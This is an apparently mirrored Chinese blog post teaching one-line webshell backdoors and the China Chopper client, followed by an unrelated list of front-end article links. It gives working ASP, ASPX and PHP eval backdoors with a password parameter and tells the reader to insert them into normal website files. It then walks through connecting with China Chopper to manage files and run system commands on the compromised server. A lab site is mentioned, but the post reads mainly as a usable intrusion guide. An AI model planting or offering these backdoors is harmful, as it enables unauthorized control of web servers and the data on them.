zoukankan      html  css  js  c++  java
  • 一句话木马与caidao

    实验吧有个试验环境:http://www.shiyanbar.com/experiment-course/experiment-course/vid/1812

    菜刀的主要功能是用来连接一句话木马的,asp,aspx,php的一句话菜刀都可以连明知是这几种一句话的语句不一样

    asp的一句话是:

    <%eval request ("pass")%>

    aspx的一句话是:

    <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

    php的一句话是:

    <?php @eval($_POST['pass']);?>

    这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,例如把asp的一句话密码改成drvfan,那么改完之后就是这样的:

    <%eval request("drvfan")%>

    其他同理。
    要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。
    当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp文件,这个asp文件的全部内容就只有一个一句话,也是可以的。
    插入了一句话木马,下面就是连接了。


    在菜刀主界面,右击,选择“添加”,
    在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的不用填,
    填完之后单击“添加”,就可以了。
    添加完毕后,你的这个一句话的shell会显示到主界面里,右击它,选择“文件管理”,就可以看到网站上的文件了
    在菜刀里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能
    如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了。

    下面有一篇类似的文章《中国菜刀与一句话木马》,

    文章地址:http://blog.csdn.net/hitwangpeng/article/details/47021573

  • 相关阅读:
    表单提交:button input submit 的区别
    JavaScript中改变this指针的注意事项
    宝塔服务器配置nginx刷新404的问题汇总
    ES6笔记整理
    axios网络请求
    v-model双向绑定
    v-bind动态绑定
    前端模块化
    vue router 路由
    JS高阶函数
  • 原文地址:https://www.cnblogs.com/pursuitofacm/p/6732096.html
Copyright © 2011-2022 走看看